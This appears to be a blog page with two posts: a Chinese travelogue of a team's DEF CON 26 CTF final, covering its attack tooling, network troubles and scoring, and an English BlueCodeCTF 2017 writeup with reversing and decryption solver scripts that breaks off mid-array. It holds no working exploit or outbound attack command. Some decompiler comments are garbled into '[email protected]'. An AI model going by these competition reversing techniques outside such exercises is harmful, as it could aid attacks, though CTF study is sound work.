DEF CON CTF 26 Final之旅

发表于 2018-09-07 | | 阅读次数:

又是一年拉斯维加斯。

游记任务（1/1）

什么，问我为什么现在才写？

其实早就打算这次要写点什么东西，纪念一下。谁知道比赛结束后看到ooo说要放第三天记分板，就想等到记分板出了一起写。

我等的花都谢了……这都一个月了，准备先写一个(:з」∠)毕竟……感觉再不写很多细节都要忘记了lol
DEFCON 26 CTF参赛记 from MaskRay
DEFCON 26 CTF final summary from ddaa
友情链接递茶和hitcon两位大佬的游记，总结的都很赞，题目部分我就不重复分析了，这里只记述一下我这几天看到的DEFCON CTF见闻。

序章

为了迎接比赛，我这次大概准备了一个多月。从DEF CON23第一次与0ops一起参与DEF CON开始，23那年美签被拒，DEF CON24那年第一次去美国，b1o0p带我经历了CGC并最后取得了第二，DEF CON25 A*0*E第一次出场并在决赛取得了第三的不错的成绩，今年是跟随A*0*E第二年出征DEF CON26。
说实在当年能得第三我还是感觉挺意（de）外（yi），因为感觉从前两天的情况没想到第三天能追进前三。
这次经过大家两天多的努力，取得了第四名的成绩，今年换了主办方，OOO带来了新的规则，也让King of Hill成为了DEF CON决赛中的重要一环。
OOO的新规则要求大家在攻防与KoH这三项中不能有短板项目，明显能感觉到OOO为了攻防赛一直广为诟病的积分规则上做了一些努力，总的来说比赛体验还可以，但是相比往年的DEF CON CTF只能说……
因为KoH平时很少出现在我们参加的决赛中，所以，哪怕两年参加SECCON的记忆全是每次KoH都被各种吊打，可是仍旧没有重视起来。最终求锤得锤求死得死，再次吃了KoH的亏
不过，这次DEF CON CTF应该是我参加DEF CON以来感觉最充实的一次。

赛前准备

为了比赛需要，我花了一个月的时间准备协作平台Polaris和自动攻击系统Railgun。
写这套系统最初的想法是为了解决以前使用CTFPad和之前的自动攻击系统运维难度大，CTFPad不是自己开发的，踩了坑以后修理耗时太长，所以在今年4月底的时候和@LyleCrash一起用Python写了协作平台Polaris，后来@spacemeowx2 重构了前端，在经历了Plaid CTF和DEF CON CTF Quals以后暂时宣告完成。
7月初和实习生@wangyihanger用golang参照RESTful API标准重构了协作平台的基础部分，后来我又重构了websocket部分和写了整个攻防部分需要的逻辑，7月下半月的时候@zsxsoft加入我们，再次重构了前端并添加了攻防部分需要的前端功能。7月底的时候@septyem为协作平台添加了IDA简单协作逆向的功能。两个喜爱炮姐的人@LyleCrash和我在这段时间写了Railgun作为比赛时用的自动攻击系统，@wangyihanger ‏写了第一版Python版的自动提交，后来@LyleCrash和我又对这个python版改了不少内容，基本完成。
比赛的时候我主要负责在现场运维两台NUC和VPS服务器以及上面的服务。
不过，比赛第一天发现这个版本还是有坑，不得不在开始后第一天晚上用nodejs又重写了一个自动提交的脚本。

8月7日

赛前准备基本上榨干了我，那时候太忙了，以至于忙到压根没时间查看邮箱，凌晨要睡觉的时候才看到ooo发来的一封邮件，翻了一下发现了上一封是快一个星期以前发来的关于一些规则和现场情况的说明，还好只是一些无关紧要的规则，然后赶紧发到了群里。这时候我们才知道比赛的具体时间是PDT 8月10 早上10AM-8PM 11日10AM-8PM 12日10AM-2PM
(╯‵□′)╯︵┻━┻太匆忙了时间根本不够好不好！

8月8日

当天乘坐加航AC26和AC1898从上海转机温哥华到拉斯维加斯。
温哥华直接转美国入境体验还是不错的，排队的人几乎没有，比起让人emmm的长队这种不用排队实在是可贵又幸福。美国的入境审查是在加拿大，不用入加拿大境的。不过，其他人几乎没人有加签，所以不太敢从加拿大转机，万一赶不上飞机要过夜，那简直不要太麻烦 ╮(╯_╰)╭
下午3:58的时候到达机场，4点50到的酒店，然后在flamingo和law开了一间房，匆匆休息了一下。
晚上的时候好多人都集中到达，自动签到机坏了，flamingo楼下的checkin排起了大长队，据说都是打ctf的各国友人，熟悉的面孔也不少。

8月9日

你以为比赛就是除了比赛时间美滋滋逛街旅游睡大觉么？
太天真了孩子，来来来给你们看看我这一天干了啥：
0点45，光辉买来了炸鸡和水还有饮料，晚上没吃饭的小伙伴都过来吃了，好在买的够多不用打架，光辉万岁×3！
1点，据说checkin那边还在排队，同情一秒钟。
好容易到了早上，和@l4wio一起去拿了badge袋子，回来的路上碰到了hitcon的Orange正好也去取badge。

中午匆忙吃了点拉面垫吧，路上碰到了TokyoWestern的人并打了招呼。
其他时间一！直！在修Polaris的bug以及最后对功能进行一些调整。
晚上去套房配了路由，并把另一个路由的配置方法交给了@atiflody ，今年Flamingo房间网络带宽20M，凑合够用的程度。忙好后在套房里开了个小会，我讲了Polaris的用法，@septyem讲了IDA协作组件的用法。
本来想弄个直播录给国内的观众，结果发现Youtube直播注册以后要审一天……
折腾半天啥用没有，只能灰溜溜回去写文档……

8月10日

累并快乐着。
为了方便队友，折腾到早上4点28写出了一个Polaris的使用说明，可是好像还是有不少同学没去看这个文档，吐血一波。
接着说比赛，主办方一开始说是9点入场，然后9点20左右开始按次序叫我们入场……更坑爹的是，因为晚上折腾的太晚，Polaris测试数据库也没清理，进去以后花了一点时间稍微配了下网以后开始分发Polaris的token，再次吐血。
而这时候，已经9点45了。
可谁知这时忽然出来个坑，我去年的域名用的不是动态解析，让大家绑了一下，然后今年一开始有小部分人访问不到协作的那个markdown文档，这个后来也发现并修正了。
话说一开始上来的时候发现了不少Polaris扔到docker里以后外加nginx做转发产生的小坑，都快速的在10点之前修复了。
主办方表示十点半通网，这段时间没有公网和内网，网络链接是down的。继续吐血一波。
9点55的时候规则被公开在外网上，然后大家开始解读规则，这里其实我们花了半个小时也没把积分规则搞明白……
真正搞明白积分规则已经是第二天晚上了。
感觉规则方面的把握程度还是差的太远，毕竟有那么多人在线，但是真正愿意去看主办方文档并在群里讨论的却寥寥无几。
10点30第一个题目如约而至，名字叫reverse，题目类型是King Of Hill
坑爹的是，比赛开网后发现网络爆炸，速度甚至不如酒店的WiFi，延迟爆高无比(╯‵□′)╯︵┻━┻
10:45:19 踩了golang并发map的坑，golang在1.6以后map不是线程安全的，但是之前不知道这个问题，然后因为Websocket产生同时读写map造成Polaris崩溃
10:50:35，不知道rootcause的@zsxsoft和@wangyihanger 临时用把Polaris开在host上以及修改nginx反代端口的方法重启了Polaris。这段时间我忙于配置赛场OpenVPN没空顾及Polaris运维，@zsxsoft曾经在群里说了一句我理解错了后来因为这东西跑的没啥问题也就先那样了。
10点55现场OpenVPN通了
11点01的时候修复了Polaris文件上传的问题，nginx bodysize又一次忘记改了。
这个时候，我才发现Polaris的docker处于stop状态，看日志发现了golang并行读写map导致崩溃。
11点06椒哥做了libc的sig用于reverse
啊……感觉再吐血就凉凉了。

11点38现场会周期给scoreboard，不给访问接口，我们的座位离屏幕很远，想要看到记分板很不方便
12点，主办方给出了game_state.json，@atiflody翻译了主办方的规则
12点30，准备了两台vps跑在现场的网络环境里
12点44 @zsxsoft做了第一版scoreboard的前端
12点57放了新题poool，然后又收回去了。后来得知是因为主办方被人撸了23333333
13点05发现了Polaris跑在了docker外面，然后因为nginx上配了好多acl导致各种神奇的错误，然后又把Polaris重新在跑在了docker里面。
13点15，几个Polaris的开发在琢磨主办方这个scoreboard的json到底应该怎么算才是最终得分，这个时候早就把规则丢到了九霄云外，所以完全是在猜计算方法……orz

13点47，新题pointless。@zsxsoft修了scoreboard的一些bug
14点08我们才clone好pointless，这时候主办方git可用性非常差，后来主办方把这道题包扔到公网上去了。
这期间主办方网络全程爆炸，下载速度大概只有10K~50K不等
14点25 楼下网络和服务状态已经比较稳定，我在交代了@LyleCrash一些维护要点以后困得不行去楼上休息了
16点23我们现场桌子电源被人踢了(╯‵□′)╯︵┻━┻好在28分恢复电源，VPS是可用的，但是OpenVPN的赛场内网断了，好像没人发现这个事，鸡哥因为断网不方便做KoH在断网期间来了现场
17点55我下楼恢复网络，期间OpenVPN与主办方网络断开大概1个半小时，还好这期间没有自动攻击的题目正在运行，要不然就亏大了
18点40 @dmxcsnsbh 2+2本地getshell
19点12 诞生了第一个攻击flag
19点23 exp适配了Railgun，但是发现Railgun打不了，发现拉不下来exp，马上想到是@LyleCrash的token权限不对，然后检查以后果然不对，修了以后缺题目基础配置，马上加上了以后开始打全场，然后发现exp返回的flag都是空的
19点35 攻击脚本重新适配了Railgun，可以打全场
19点50 reverse下线
20点整第一天结束，主办方开会说去年legitbs拿到了1Gbps带宽，他们今年只有20～30Mbps，而且有两倍的队伍，明天9点入场10点开场，KoH会重新算分
20点19 讨论提交程序的效率问题，@zsxsoft建议用nodejs重写，@LyleCrash修了好久提交程序的bug，然后我则是花了一些时间用nodejs重写了提交程序。
Slipper说之所以一开始上的是KoH是因为攻防的patch管理有bug

总的来说，整个过程非常紧张辛苦，不过偶尔还是有一些好玩的乐趣。
碰到了不少朋友：8点45的时候起床和@LyleCrash下楼去现场，电梯里碰到了老熟人Riatre和宋教授，在CTF赛场门前和Tea Delivers的人还有r3kpig的人聊了几句，在Tea Delivers看到了大学同专业的同学wirefish，还是非常开心的。
11点11现场开始放东北玩泥巴，感觉这一定要是国人才能懂空耳的乐趣，所以我们一直猜这音乐是slipper选的233333333

8月11日

依旧是紧张忙碌的时间线。
晚上修Polaris bug修了一些，然后大概早上三点左右睡觉了
9点28 @zsxsoft优化了Polaris的nginx配置，scoreboard改直接读game_state.json
9点57宣布比赛10点半开始
10点开队长会，KoH重新算分后递茶和我们分数受到影响，还有说明patch是交了他就check，check完了马上告诉你过没过，不能看别人的patch，所有的patch通过http接口提交，一轮只能交一次，所有的patch需要重新提交。外网带宽升级，一个队10Mbps。
10点半宣布延迟到11点开赛
10点45的时候尝试了酒店网络，LTE开Wi-Fi，均不好使。
10点53网通了，team interface没开
11点08看到9架构KoH，11点13开放pointless攻击，主办方说不开2+2，大家做了一晚2+2感觉十分失落，并且这个时候team interface没开，打下来flag也没法交。
11点29，KoH9个架构的没有了，稍后又重新出现
11点50 Pointless可以连，交互几次就断了，2+2没开
11点55主办方说interface有bug在修
12点06 hitcon KoH11个arch
12点17 主办方宣布patching is alive，但是攻防题目都gg了，说题目30分钟以后上线
12点37 2+2开网
12点50 pointless开网，连不上。
13点新题oooediter
13点53发现主办方推flag时间和轮数更新时间不同步
14点09主办方表示pointless被d
14点15 Polaris开发小组又一次讨论了scoreboard计算方法但是这时候讨论得出的算法还是错的
14点38去跟主办方交涉flag推送的问题，主办方说会检查，但是从后面的积分板分析来看，并没有修复
14点50 主办方暂时下掉pointless，做此题的同学表示非常愤怒
15点28发现不能Exploit不能选多个依赖，后来晚上修bug的时候发现是我优化的时候把exploitid这一列给当成主键了不能重复。这里临时用直接ssh上去拉文件的方法解决了一下，这里因为这个bug oooeditor损失了一些得分，感觉十分遗憾。
15点40发现昨晚临时写的js提交脚本bug，15点42的时候修复
16点整，主办方宣布2+2退休了，做题同学表示做了一天是个死题，非常坑，然后做pointless的同学说你觉得这题最坑是因为没做pointless
16点20 poool放题
16点24 椒哥看到了poool没有patch字节限制，简直按捺不住内心的渴望
16点47 有同学把VPS玩挂了，重启，oooeditor还能打两个了
17点44宣布晚上9点结束
18点20新题bew
18点25 Flamingo网络挂了
19点05 caesars Wi-Fi挂了
19点10 poool DEFKOR00T一血
19点16 Flamingo网络恢复
19点21主办方宣布poool今天只能patch两次
19点34 bew打全场
19点45 pointless放流量
20点20新题目vchat，pointless退休
21点比赛结束，主办方诚恳的对pointless可用性问题作了道歉
比赛结束后Riatre来吐槽pointless和积分规则

拉斯维加斯罕见的下了雨，手机上收到了推送的洪水警报和沙尘暴警报

8月12日

2点@zsxsoft用新算法修正了积分板
5点56找到了多依赖的root cause并修复。
9点半队长会，主办方宣布代码写错导致防御分数计算错误，已重新算分，今天poool一个tick可以提交一个patch，但是patch大概会用4分钟检查可用性
10点开赛，poool没开
10点42宣布patch系统回滚，所有的patch需要重新打
10点45 poool开题
10点47 主办方外网断了，这期间我尝试使用酒店WiFi和DEF CON会场WiFi跑Railgun和自动提交脚本并运行了多个实例保证不会因为网络问题导致漏掉flag
11点32现场网络再次故障
12点DEFKOR00T reeducation 一血
13点10 发现了vchat的hint，其实早上队长会说了，我英语不行没理解到
13点30主办方表示可以上去领酒喝
13点40主办方网络再次故障，44分恢复
14点比赛结束，今年没有final countdown，四点半ending ceremony
大家纷纷吐槽三天看了三道死题，累计浪费时间达到两位数，web题第二天毫无通知改环境，pointless从头到尾连不上等问题。
赛后和slipper还有Riatre聊天，slipper说poool和vchat是他出的，递茶poool在第二天晚上写出了type confusion的exp，这个漏洞我们直到比赛结束前10分钟才写出来。
后来大家过来合影，然后去看闭幕式，被DEFCON主办方以满员的理由引到楼下以后发现楼下闭路电视坏了，回到二楼跟看门人员交涉以后谢大哥一个人进去听了一会，后来大家都回到房间看直播。
18点24主办方通过twitter放出最后排名。

现场运维合影

大合影

总结

这里先用手上的数据做个小结吧，
oooeditor accept了106个独立flag，总共有107个长度为48的独立flag

bew accept了339个独立的flag，总共有346个长度为48的独立flag，其中第二天只accept了5个独立的flag。

twoplustwo accept了61个独立的flag，总共有228个长度为48的独立flag（主要是主办方在题目下线以后还在往这个题目推flag）

pointless从来没有用自动攻击打成功过
poool accept了529个独立flag，总共有542个长度为48的独立flag

reeducation accept了432个独立flag，总共有433个长度为48的独立flag

从主办方最后一天提供的记分板数据看

serviceid=1 30 pointless
serviceid=3 328 bew
serviceid=4 116 oooeditor
serviceid=5 179 twoplustwo 178轮截止

前两天总分变化趋势

第二天攻防赛一开始到DEFKOR00T开始Poool打全场之前的队伍攻击数量曲线，可以明显的感受到推随机间隔时间推flag和pointless巨差的可用性对分数造成的影响，还有对不同的队伍可能存在的看脸概率能打成功的问题。这里大家后来赛后交流的时候都感觉shellphish是强行被避嫌，pointless这道题到最后大家应该都没怎么补、但是全场只有shellphish的这道题是可以被概率攻击成功的。

第二天DEFKOR00T打全场到第二天结束的攻击队伍数量曲线，大概在221轮附近的时候发现了flag random accept的情况并及时调整了自动提交程序的代码。
看积分曲线感觉是DEFKOR00T先首先poool和bew两道题打了全场，但是我清楚的记得主办方当时宣布的是Bew一血是PwnThyBytes，于是回去仔细观察了下bew这个题有人做出来以后的计分板发现了个很有趣的事情，PwnThyBytes首先在217轮攻击了TokyoWestern，然后紧随其后koreanbadass和mhackeroni都在218轮攻击了PPP，然后这个时候DEFKOR00T Bew开始打全场，PwnThyBytes直到219轮才开Bew始打全场，我们Bew紧随其后在220轮开始打全场。

以上，defcon26吐槽完毕。后面美西玩了5天，感谢AAA老司机全程开车，我全程在副驾一脸我想学开车.jpg。结束后第二天飞去SFO然后逛了旧金山，斯坦福，硅谷。刚下飞机就感受到了地中海气候的威力。在硅谷约了宋教授、h0twinter以及王老师keenjoy95，王老师请我们吃了川菜，感觉味道不错，然后宋教授带着我们逛了一圈Google以后就回到旧金山，沿一号公路一路向南逛了17里湾并在蒙特雷的餐馆巧遇陈少，错过了Big Sur以后游览了紫沙滩，一号公路ATT信号好都是骗人的，半程没信号，海象滩看了日落以后狂飙数百英里深夜赶到洛杉矶并在洛杉矶玩了两天，然后我周六早上的飞机LAX到YVR，在温哥华摸鱼一天弥补一下去年Pwn2Own没来得及玩温哥华的遗憾，非常感谢初中同学提供食宿并且全程带路。周日上午上了回上海的飞机。

美西摸鱼团路线

资深老司机

在Google园区的合照

一号公路17里湾入口

海象滩日落

最后的最后再吐槽两句网鼎，改了个Polaris的离线版，两天比赛主要负责交flag和喊666，谢大哥🐂🍺。这么多人的攻防i春秋能运维成这样子凭良心讲还是不错的。

最后欢迎各位大佬指出文章中的错误和不足，谢谢大家耐心看我吐槽～

BlueCodeCTF2017 writeup

发表于 2017-11-13 | | 阅读次数:

Reversing

fs hell

printf format string brainfuck

using this script to trans the format string to pesudo c code.


prog = open('program.txt').read().split('\n')
r = dict()
w = dict()

w[6] = 'b'
w[7] = 'c'
w[8] = 'd'
w[9] = 'e'
w[10]='flag[e]'
w[13] ='cbInst'

r[1] = 'b'
r[2] = 'c'
r[3] = 'd'
r[4] = 'e'
r[5] = 'flag[e]'
r[1] = 'b'
r[11] = -1#'.if b==0'
r[12] = -2#'.if b<0'
i = -1
for x in prog:
    i+=1
    print 'label_%04X:'%i,
    if x=='':
        print ''
        continue
    assert(len(x.split('%'))>2)
    par = []
    for y in x.split("%"):
        if y=='': continue
        #print y,par
        if '*' in y:
            par.append(r[int(y[5:-2])])
        elif 'n' in y:
            addr = int(y[:y.index('$')])
            if addr==13:
                if int(par[0])==-1:
                    print "if(b==0) goto label_%04X;"%(i+2)
                elif int(par[0])==-2:
                    print "if(b<0) goto label_%04X;"%(i+2)
                else:
                    print "goto label_%04X;"%((1+i+int(par[0]))&0xffff)
            else:
                if 'hhn' in y:
                    print "*(unsigned char *)&%s=(%s)&0xff;"%(w[addr],"+".join(par))
                else:
                    if len(par)>1:
                        print "*(unsigned short *)&%s=(%s)&0xffff;"%(w[addr],"+".join(par))
                    else:
                        print "*(unsigned short *)&%s=%s&0xffff;"%(w[addr],"+".join(par))

        else:
            par.append(y[y.index('.')+1:y.index('d')])

copy the initial parameter to the front and run solver

def ror(x,bits):
    return ((x>>bits)|(x<<8-bits))&0xff
aa =  flag[288:288+39]
assert(len(aa)==39)
bb = flag[512:512+256]
assert(len(bb)==256)
f = []
y = 0
for i in range(len(aa)):
    s = (bb[aa[i]]+bb[y])&0xff
    print hex(s)
    ch = 0x100-s
    y=aa[i]
    f.append(ror(ch,i%8))

print f
print ''.join(map(chr,f))

Finally get the flag CBCTF{Do_Y0U_W4nt_MOR3_foRm4t_57RiNg5?}

One of Three Billion

Memory fornesic, but related article we got from search engine is useless, because it does not provide a open source tools. First need to build a tools to parse Java card op code.

import os

def parse(data):
    d = dict()
    d[1032] = 'func1'
    d[1025] = 'func2'
    d[258] = 'func3'
    d[260] = 'func4'
    d[263] = 'func5'
    d[521] = 'func6'
    d[772] = 'func7'
    f = dict()
    f[2160] = 'stfunc1'
    f[2276] = 'read_word'
    f[2278] = 'stfunc2'
    i = 0
    while i< len(data):
        op = data[i]
        print "%04X"%i,
        i = i + 1
        if ord(op) == 0x70:
            print "%02x %02x\t%s 0x%02x" % (ord(op), ord(data[i]), "goto ", 2+i+ord(data[i]))
            i = i + 1
        elif ord(op) == 0x28:
            print "%02x %02x\t%s %02x" % (ord(op), ord(data[i]), "astore ", ord(data[i]))
            i = i + 1
        elif ord(op) == 0x1a:
            print "%02x\t\t%s" % (ord(op), "aload_2 ")
        elif ord(op) == 0x19:
            print "%02x\t\t%s" % (ord(op), "aload_1 ")
        elif ord(op) == 0x08: 
            print "%02x\t\t%s" % (ord(op), "sconst_5 ")
        elif ord(op) == 0x10:
            print "%02x %02x\t%s %02x" % (ord(op), ord(data[i]), "bspush ", ord(data[i]))
            i = i + 1
        elif ord(op) == 0x8b:
            print "%02x %02x %02x\t%s %s" % (ord(op), ord(data[i]), ord(data[i+1]), "invokevirtual ", d[ord(data[i])<<8| ord(data[i+1])])
            i = i + 2
        elif ord(op) == 0xa8:
            print "%02x %02x %02x\t%s 0x%02X" % (ord(op), ord(data[i]), ord(data[i+1]), "goto_w ", 3+i+(ord(data[i])<<8|ord(data[i+1])))
            i = i + 2
        elif ord(op) == 0x1f:
            print "%02x\t\t%s" % (ord(op), "sload_3 ")
        elif ord(op) == 0x6a:
            print "%02x %02x\t%s 0x%02X" % (ord(op), ord(data[i]), "if_scmpeq ", 2+i+ord(data[i]))
            i = i + 1
        elif ord(op) == 0x61:
            print "%02x %02x\t%s 0x%02X" % (ord(op), ord(data[i]), "if_ne ", 2+i+ord(data[i]))
            i = i + 1
        elif ord(op) == 0x29:
            print "%02x %02x\t%s %02x" % (ord(op), ord(data[i]), "sstore ", ord(data[i]))
            i = i + 1
        elif ord(op) == 0x16:
            print "%02x %02x\t%s %02x" % (ord(op), ord(data[i]), "sload ", ord(data[i]))
            i = i + 1
        elif ord(op) == 0x11:
            print "%02x %02x %02x\t%s %d" % (ord(op), ord(data[i]), ord(data[i+1]), "sspush ", ord(data[i])<<8|ord(data[i+1]))
            i = i + 2
        elif ord(op) == 0x8d:
            print "%02x %02x %02x\t%s %s" % (ord(op), ord(data[i]), ord(data[i+1]), "invokestatic ", f[ord(data[i])<<8| ord(data[i+1])])
            i = i + 2
        elif ord(op) == 0x7b:
            print "%02x %02x %02x\t%s 0x%X" % (ord(op), ord(data[i]), ord(data[i+1]), "getstatic_a ", ord(data[i])<<8|ord(data[i+1]))
            i = i + 2
        elif ord(op) == 0x99:
            print "%02x %02x %02x\t%s 0x%02X" % (ord(op), ord(data[i]), ord(data[i+1]), "ifne_w ", 3+i+(ord(data[i])<<8|ord(data[i+1])))
            i = i + 2
        elif ord(op) == 0x55:
            print "%02x\t\t%s" % (ord(op), "sor ")
        elif ord(op) == 0x41:
            print "%02x\t\t%s" % (ord(op), "sadd ")
        elif ord(op) == 0x57:
            print "%02x\t\t%s" % (ord(op), "sxor ")
        elif ord(op) == 0x4f:
            print "%02x\t\t%s" % (ord(op), "sshr ")
        elif ord(op) == 0x4d:
            print "%02x\t\t%s" % (ord(op), "sshl ")
        elif ord(op) == 0x43:
            print "%02x\t\t%s" % (ord(op), "ssub ")
        elif ord(op) == 0x45:
            print "%02x\t\t%s" % (ord(op), "smul ") 
        elif ord(op) == 0x3:
            print "%02x\t\t%s" % (ord(op), "sconst_0 ") 
        elif ord(op) == 0x4:
            print "%02x\t\t%s" % (ord(op), "sconst_1 ")    
        elif ord(op) == 0x6:
            print "%02x\t\t%s" % (ord(op), "sconst_3 ")  
        elif ord(op) == 0x3b:
            print "%02x\t\t%s" % (ord(op), "pop ")
        elif ord(op) == 0x7a:
            print "%02x\t\t%s" % (ord(op), "return ")     
        else:
            print "unkonw: %02x" % ord(op)
            break

f = open('dump1.bin', 'rb')
ins = f.read()
f.close()

parse(ins[1:0x151])

And then write a vm can run this code.

stack = []
v = {}
v[4] = 0x5b4c
v[5] = 0x0977
v[6] = 0x5ad8
v[7] = 0x8da7

v[4] = 0x612c
v[5] = 0x4445
v[6] = 0xe078
v[7] = 0x567c
def push(x):
    stack.append(x & 0xffff)
def pop(sign = False):
    value = stack.pop(len(stack)-1)
    if value & 0x8000 and sign:
        value -= 0x10000
    return value
for line in code.split("\n"):
    s = line.split()
    assert len(s) % 2 == 1

    s = s[len(s)/2+1:]
    op = s[0]
    operands = map(lambda x:int(x, 16), s[1:])
    print op, operands
    if op == "sload":
        push(v[operands[0]])
    elif op == "sstore":
        t = pop()
        v[operands[0]] = t
    elif op == "sspush":
        push(operands[0] << 8 | operands[1])
    elif op == "bpush":
        push(operands[0])
    elif op == "sadd":
        b = pop()
        a = pop()
        push(a + b)
    elif op == "ssub":
        b = pop()
        a = pop()
        push(a - b)
    elif op == "sxor":
        b = pop()
        a = pop()
        push(a ^ b)
    elif op == "sor":
        b = pop()
        a = pop()
        push(a | b)
    elif op == "sshr":
        b = pop(True)
        a = pop(True)
        push(a >> b)
    elif op == "sshl":
        b = pop()
        a = pop()
        push(a << b)
    elif op == "smul":
        b = pop(True)
        a = pop(True)
        push(a * b)
    elif op == "sxor":
        b = pop()
        a = pop()
        push(a ^ b)

    elif op == "sconst_5":
        push(5)
    elif op == "sconst_1":
        push(1)
    elif op == "sconst_3":
        push(3)
        
    else:
        print "ERROR"
        raw_input()
    print v
    print stack
    
print map(hex, [v[4], v[5], v[6], v[7]])

Credit to 疯狂六月雪 & hen @KeenLab

Misc

Incident Response

Found some interesting respond, dump it to file and parse it as x64 asm code.
Reverse the binary and write a c program to decode the flag.

#include <stdio.h>

typedef struct
{
  int a;
  int b;
  char key[256];
}ctx;

__int64_t crypt_ctx_init(ctx *context, char *inKey)
{
  __int64_t v2; // [email protected]
  __int64_t result; // [email protected]
  unsigned char v4; // [email protected]
  char v5; // [email protected]

  context->b = 0;
  context->a = 0;
  v2 = 0LL;
  do
  {
    context->key[v2] = v2;
    ++v2;
  }
  while ( v2 != 256 );
  result = 0LL;
  v4 = 0;
  do
  {
    v5 = context->key[result];
    v4 += inKey[result & 0x1F] + context->key[result];
    context->key[result++] = context->key[v4];
    context->key[v4] = v5;
  }
  while ( result != 256 );
  return result;
}

void * decrypt(ctx *context, char *buf, __int64_t cbBuf)
{
  char *v3; // [email protected]
  int v4; // [email protected]
  __int64_t v5; // [email protected]
  char v6; // [email protected]
  __int64_t v7; // [email protected]
  __int64_t result; // [email protected]

  v3 = &buf[cbBuf];
  if ( cbBuf )
  {
    do
    {
      v4 = context->b;
      v5 = (unsigned char)(context->a + 1);
      context->a = v5;
      v6 = context->key[v5];
      v7 = (unsigned char)(v6 + v4);
      context->b = v7;
      context->key[v5] = context->key[v7];
      context->key[v7] = v6;
      result = (unsigned char)context->key[(unsigned char)(context->key[v5] + v6)];
      *buf ^= result;
      ++buf;
    }
    while ( v3 != buf );
  }
  return result;
}
char peer1_2[] = { /* Packet 165 */
    0x50, 0xbd };
char peer0_3[] = { /* Packet 167 */
    0x95, 0x3b, 0x7a, 0xff, 0xd9, 0x18, 0x32, 0x3a, 
    0x33, 0x28, 0x32, 0xe1, 0x12, 0xbe, 0xec, 0xa9, 
    0x46, 0x30, 0x7d, 0x33, 0x54, 0xd5, 0x3c, 0xbd, 
    0xc4, 0xc1, 0xcc, 0x80, 0x35, 0x3a, 0x25, 0x3d, 
    0x88, 0xbf, 0x14, 0x69, 0xb7, 0xd1, 0xf3, 0x0d, 
    0x17, 0x96, 0x4c, 0xb5, 0x19, 0x5f, 0x4c, 0x7e, 
    0x15, 0xe1, 0x21, 0x5b, 0x5e, 0x24 };
    char peer1_3[] = { /* Packet 169 */
        0x10, 0xb6, 0xf8 };
        char peer0_4[] = { /* Packet 170 */
        0x48, 0xc8, 0x0c, 0x81, 0x3a, 0xce, 0x27, 0x92, 
        0xd4, 0xbd, 0x18, 0x75, 0x1b, 0xbb, 0xfc, 0x49, 
        0x15 };
        char peer1_4[] = { /* Packet 172 */
        0x3c, 0x18, 0x14, 0xac, 0x38, 0xa9 };
        char peer0_5[] = { /* Packet 173 */
        0x1d, 0x3d, 0xb5, 0x74, 0xae, 0x8a, 0x02, 0x13, 
        0x87, 0x45, 0x14, 0xc1, 0x9e, 0x2d, 0xcf, 0x51, 
        0x32, 0xc0, 0xb4, 0xc6, 0x15, 0xdb, 0x67, 0x31, 
        0x36, 0x72, 0x2a, 0x2a, 0x2d, 0xad, 0x9f, 0x2f, 
        0x91, 0xf6, 0x84, 0xfe, 0xa8, 0x9d, 0x60, 0x3b, 
        0x0f, 0x9d, 0x22, 0x16, 0x5b, 0x95, 0x08, 0xe0, 
        0x8b, 0x82, 0x3a, 0x3c, 0xad, 0x69, 0x85, 0xb9, 
        0x13, 0xaa, 0xb1, 0xf3, 0xad, 0xff, 0x74, 0x72, 
        0xc8, 0x22, 0xf0, 0x86, 0xd9, 0x16, 0x23, 0x3e, 
        0x6c, 0x1f, 0xfd, 0xaa, 0x5f, 0x9f, 0x43, 0xe1, 
        0x9b, 0xb4, 0x7c, 0xcd, 0xa2, 0xe9, 0xfc, 0xd0, 
        0xa8, 0xcd, 0xbe, 0x88, 0xfb, 0xa2, 0x2f, 0x39, 
        0xd0, 0xcb, 0x01, 0x4b, 0x76, 0x99, 0x15, 0xb7, 
        0x43, 0x83, 0xf6, 0xf9, 0x60, 0xb7, 0x50, 0x45, 
        0x9c, 0x9e, 0x2c, 0xa6, 0x02, 0x3b, 0xb1, 0x98, 
        0x55, 0xb4, 0x43, 0x08, 0x29, 0x1c, 0x87, 0x74, 
        0x27, 0xee, 0x2d, 0x5d, 0x32, 0x1a, 0x99, 0xba, 
        0x6b, 0x6e, 0x8a, 0xbc, 0xd1, 0x35, 0x8a, 0x5d, 
        0xf7, 0x69, 0x46, 0xc3, 0x17, 0x0a, 0xe2, 0x62, 
        0xac };
        char peer1_5[] = { /* Packet 175 */
        0xc9, 0xaf, 0x42, 0x66, 0x76, 0xee, 0x77, 0xa5, 
        0xd1, 0x0c, 0xa0, 0xa3, 0x22, 0x05, 0xb3, 0x02, 
        0x77, 0x25 };
        char peer0_6[] = { /* Packet 176 */
        0xc5, 0x49, 0x1f, 0xcb, 0x60, 0x22, 0x9b, 0x3c, 
        0x52, 0x56, 0x1f, 0x98 };
        char peer1_6[] = { /* Packet 188 */
        0x9a, 0xc5, 0x54, 0xe8, 0x17, 0x6f, 0x91, 0x7e, 
        0x59, 0xe2, 0x84, 0x01, 0xdb, 0x8e, 0xa0 };
        char peer0_7[] = { /* Packet 189 */
        0xbb, 0x7d, 0x76, 0xd7, 0x68, 0xed, 0xfc, 0x82, 
        0xc4, 0xe6, 0x9a, 0x20, 0x11, 0x33, 0xb6, 0xe2, 
        0x8a, 0x84, 0xb2, 0x1d, 0x28, 0xa2, 0xfe, 0x71, 
        0xe3, 0x8b, 0x2b, 0xaf, 0x4d, 0xec, 0x42, 0x0b, 
        0x5a, 0x61, 0x7b, 0xd1, 0xde, 0x09, 0xb4, 0x0c, 
        0x6f, 0xae, 0x70, 0x0b, 0x84, 0xee, 0xf3, 0x6a, 
        0x95, 0xd5, 0x60, 0xb1, 0x94, 0x73, 0x12, 0x88, 
        0xb3, 0x9d, 0x6b, 0x61, 0x6f, 0x17, 0xa9, 0xa1, 
        0xe3, 0x22, 0xb1, 0xf2, 0x29, 0x99, 0x05, 0x5f, 
        0xce, 0xd5, 0x01, 0xbe, 0x0c, 0xf2, 0xe2, 0xde, 
        0x13, 0x05, 0x81, 0x86, 0x90, 0xae, 0xe8, 0xa1, 
        0xe1, 0x2e, 0xee, 0x5a, 0x36, 0x4a, 0xb6, 0x1a, 
        0xed, 0xd9, 0xda, 0x4c, 0x1e, 0xa3, 0xae, 0x93, 
        0x9b, 0xbd, 0xef, 0xa2, 0x17, 0xda, 0x4d, 0x77, 
        0x64, 0x81, 0x0f, 0x87, 0xcb, 0x32, 0x1b, 0x77, 
        0x0b, 0x78, 0xfa, 0xad, 0x9d, 0x6f, 0xd1, 0x8b, 
